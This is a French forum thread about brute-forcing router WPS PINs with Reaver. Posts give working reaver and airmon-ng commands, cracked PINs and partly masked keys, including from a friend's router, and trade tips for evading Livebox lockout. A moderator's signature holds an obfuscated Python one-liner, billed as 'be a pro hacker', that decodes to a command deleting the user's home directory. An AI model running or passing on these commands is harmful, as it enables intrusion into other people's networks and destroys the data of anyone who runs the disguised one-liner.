Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#226 02-10-2012 09:30:09

WP4
Membre
Inscription : 25-09-2012
Messages : 11

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Plus que redoutable cet outil !
J'ai volontairement mis un pin simple pour ne pas attendre 15 heures.... effectivement il n'en n'a pas fallu tant !

[+] Pin cracked in 9 seconds
[+] WPS PIN: '01235678'
[+] WPA PSK: 'xxxx-xxxx-xxxx-xxxx'
[+] AP SSID: 'xxx-55555'

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#227 02-10-2012 09:50:54

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Quel modèle de routeur est-ce?

Hors Ligne

#228 02-10-2012 10:47:39

WP4
Membre
Inscription : 25-09-2012
Messages : 11

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

kcdtv a écrit :

Quel modèle de routeur est-ce?

Centro grande Analog Standard

Dernière modification par WP4 (02-10-2012 11:06:01)

Hors Ligne

#229 03-10-2012 16:53:02

flatounet
Membre V.I.P.
Inscription : 05-03-2010
Messages : 209

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

bon re testé avec reavers , cependant aucun résultat positif :

blocage à 90.90% .....
malgré plusieurs tentative.

Dernière modification par flatounet (21-10-2012 18:18:35)

Hors Ligne

#230 05-11-2012 04:51:17

jlf
Membre Indétronable
Inscription : 06-10-2012
Messages : 195

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

eu une question je suis entrain de testé cette attaque contre ma livebox et l AP ce vérouille aser rapidement et de maniere défintif pour que je puisse relancer l'attaque faut que je change le pin quelq 'un connait le délai entre deux attaque pour evité ce blocage car meme si je met 60 seconde par attaque l AP ce vérouille quand meme

Hors Ligne

#231 05-11-2012 20:35:48

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Question aux déteneur d'une livebox, le WPS est-il configurable dans le cd fourni d'orange? quel renseignement le gestionnaire sans fil vous demande?

Merci

Hors Ligne

#232 05-11-2012 23:31:08

jsaispas
N00b
Inscription : 05-11-2012
Messages : 3

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Bonjour à tous,

J'ai pu testé la méthode de crack via reaver avec succès en 1h20 (sans connaître le pin par défaut)

La box :
- nom : Thomson TG787
- numéro de série : 11100703300xxxx
- version logiciel : 8.4.S.G
- date d'installation : 2012

Environnement :
- machine virtuel (sous parallels Desktop) : BT5R2-KDE-64
- reaver (dernière version du svn) : r113
- clé wifi (pourrave mais qui marche) : 8187L

Commande :
./reaver -i mon0 -b 00:F1:9F:BF:XX:XX -c 1 -d 0 -vv --dh-small

Résultat :
[+] Pin cracked in 4765 seconds
[+] WPS PIN: '01235625'
[+] WPA PSK: '88359972DE41FD795F6615929E2........................................'
[+] AP SSID: 'Bbox-1A3E**'


Maintenant le truc qui me chagrine, j'ai pris un pc qui ne s'était jamais connecté à la box et j'ai rentré le WPA PSK pour me connecter et celui-ci à marché alors que la box est configurée comme telle :
- Sécurité : WPA2
- encrypt : TKIP+AES
- clé : AF0956E0**

Dernière modification par jsaispas (06-11-2012 08:59:25)

Hors Ligne

#233 05-11-2012 23:53:46

jlf
Membre Indétronable
Inscription : 06-10-2012
Messages : 195

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

lol cassé en moins de une heure chapeau l ami


koala sincerement j'ai pas eu souvenir de sa que il demqndeais a rentrer un pin

Dernière modification par jlf (05-11-2012 23:56:42)

Hors Ligne

#234 06-11-2012 00:05:08

jlf
Membre Indétronable
Inscription : 06-10-2012
Messages : 195

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

eu bizare je suis entrain de rattaquer la livebox et toujours pas bloquer vraiment bizarre car normalement au bout de 1 minute a peine je suis bloquer et je ne peut plus attaquer la sa va faire 5 minute bientot que je l'attaque et je ne suis toujours pas bloquer

Hors Ligne

#235 06-11-2012 00:09:26

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

jsaispas a écrit :

Maintenant le truc qui me chagrine, j'ai pris un pc qui ne s'était jamais connecté à la box et j'ai rentré le WPA PSK pour me connecter et celui-ci à marché alors que la box est configurée comme telle :
- Sécurité : WPA2
- encrypt : TKIP+AES
- clé : AF0956E0**

C'est sans doute parce que Reaver te renvoie une PSK, la version hachée de la passphrase. Pour le WPA c'est d'ailleurs la seule "clé", puisqu'il a besoin d'une clé de longueur fixe pour travailler. La fonction PBKDF2 est donc utilisée pour transformer une passphrase ASCII "humaine" en sa version hachée de 64 caractères de long.

Pour passer de l'une à l'autre, tu peux utiliser wpa_passphrase :

wpa_passphrase SSID passphrase
# Dans ton cas : 
#wpa_passphrase Bbox-1A3E** AF0956E0**

Au passage, que ça soit ta box ou pas, tu ne devrais pas laisser trainer sa clé et sa PSK en clair sur le forum... Même si tu masques son adresse MAC, le SSID et la clé suffisent, tu ne sais pas qui peut passer par ici wink

Dernière modification par antares145 (06-11-2012 00:11:16)

Hors Ligne

#236 06-11-2012 00:31:08

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Dans tous les cas merci pour les données ça peut être bien utile...

Hors Ligne

#237 06-11-2012 00:34:07

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

@jif

Pour se connecter sous windows a ta livebox tu suis quel procédure? car j'ai une livebox test sans cd, sous linux sa marche bien mais sous win7/64 impossible de se connecter en WPS malgrès l'appui sur le bouton c'est pour ça que je pensais au gestionnaire sans fil et au cd.

Dernière modification par koala (06-11-2012 00:34:44)

Hors Ligne

#238 06-11-2012 01:05:54

jlf
Membre Indétronable
Inscription : 06-10-2012
Messages : 195

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

sous windows 7 enfaite pour m associer je cliquais sur le reseau  ensuite j appuyais sur le bouton et hop j etait associer sans rien rentre
ok vais teste avec le cd

Hors Ligne

#239 06-11-2012 08:16:22

proferic
Membre
Inscription : 04-11-2012
Messages : 17

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Bonjour à tous,

J'ai encore tenté avec la ligne de commande de "jsaispas" mais toujours ma livebox qui se met en sécurité !!! grrrrr
Je crois que nous allons être obligé de dire que le WPA de chez Orange est incassable !! snif snif

Hors Ligne

#240 06-11-2012 08:39:35

jsaispas
N00b
Inscription : 05-11-2012
Messages : 3

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

antares145 a écrit :

Au passage, que ça soit ta box ou pas, tu ne devrais pas laisser trainer sa clé et sa PSK en clair sur le forum... Même si tu masques son adresse MAC, le SSID et la clé suffisent, tu ne sais pas qui peut passer par ici wink

C'était la box d'un ami, j'ai quand même masqué la clé si jamais mais vu où il habite je ne suis pas sûr qu'on puisse le capter de l'extérieur, déjà moi j'étais à -56 sous airodump...

Je vois que vous avez tous des problèmes sous Livebox, c'est sur toutes ? J'ai une vieille Livebox chez mes parents mais je sais pas si c'est compatible (y a encore le W lumineux de Wanadoo dessus)

Hors Ligne

#241 06-11-2012 17:07:58

jlf
Membre Indétronable
Inscription : 06-10-2012
Messages : 195

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

hier il m'est arriver un truc vraiment bizarre j'ai pu attacker la livebox V2 sans que elle me bloque par contre je recevais souvent erreur wps code 0x02 mais je pouvais continuer a l attaquer vraiment bizarre
j'ai retest et la elle me bloque la salo...

Hors Ligne

#242 06-11-2012 17:18:31

proferic
Membre
Inscription : 04-11-2012
Messages : 17

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Après une multitude d'attaque sur plusieurs livebox, toutes se mettent en sécurité !!
Donc, si quelqu'un a une solution, ça serait cool de la faire partager afin de ne pas pouvoir dire, qu'elles sont incassables ces Livebox !!!
lol

Hors Ligne

#243 06-11-2012 17:26:06

jlf
Membre Indétronable
Inscription : 06-10-2012
Messages : 195

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

enfaite les livebox on bien ete pensé niveau sécurité au bout de temps d'attaque elle ce bloque j'ai meme fait -d 3600  meme tenter de me faire passé pour windows 7 sa y a rien fait elle a finit par ce bloqué j'ai juste un répit un peut plus long quand j'ajoute  -N .De plus il on pas ete con un simple débranchement ou bouton reset marche pas donc un pirate ne pouvais pas forcé la personne a débrancher et rebrancher sa box pour reactivé le pin seul le changement de pin marche sur ce coup je dit chapeau orange vous nous cassé bien les bonbons lol si quelq'un arrive a pété le wps livebox V2 alors la tout mes respect

moi ce qui ma foutu sur le cu c'est que meme apres avoir appuyer sur le bouton reset elle etait encores bloquer

Hors Ligne

#244 08-11-2012 20:05:48

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Je me disais, j'ai un TP-LINK WR1043ND ça vous aiderai si je lui fais générer quelque code WPS en plus de celui par défaut?

Hors Ligne

#245 09-11-2012 00:34:09

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Oui wink

Hors Ligne

#246 09-11-2012 15:50:17

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Voila, ça ressemble a une génération aléatoire je sais pas si on peut en tiré grand chose...


TP-LINK

PIN WPS

defaut:

95449654

générer:

50913831
17925501
70143126
47772311
83381386
36338436
72891988
57362818
11486534
61705678
37695002
95684208

Hors Ligne

#247 29-09-2014 21:31:47

guiyom
Banni(e)
Inscription : 22-09-2014
Messages : 10

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Salut à tous
Reaver est simple et redoutable, c'est vraiment énorme ce truc ...
sans aucune connaissance sur Linux, après 1 semaine de téléchargement et essais divers (sans rien comprendre à ce que je fais),
je me rends compte qu'il faut
--> airmon-ng start wlan0
et "kill" les trucs qui font chier,
--> reaver -i wlan0 -b [ADRESSE MAC] --fail-wait=360

et 6 heures plus tard tongue ...
kali_reaver_rules2.jpg

Dernière modification par guiyom (29-09-2014 21:33:50)

Hors Ligne

#248 01-10-2014 20:00:53

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

koala, c'est du random, l'entropie est bonne smile
(en même temps on a très peu de données, et je doute que ce soit fait autrement e toute façon)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#249 05-11-2014 17:47:08

Scarfays73
N00b
Inscription : 05-11-2014
Messages : 3

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Comment savoir que le WPS est activė?
Normalement toute les box de nos jours utilise le WPS non!?

Hors Ligne

#250 05-11-2014 18:44:53

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Scarfays73 a écrit :

Comment savoir que le WPS est activė?
Normalement toute les box de nos jours utilise le WPS non!?

Non, pas toutes !


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
8 277 17-11-2016 12:02:17 par koala
Problème reaver par Antho3674
4 296 15-11-2016 22:05:12 par kcdtv
Bruteforce WPS par regard48
8 387 15-11-2016 16:19:36 par Fab955
0 261 22-10-2016 19:03:48 par Antho3674
6 4731 05-10-2016 10:26:24 par X-Ecutioner

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.034 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]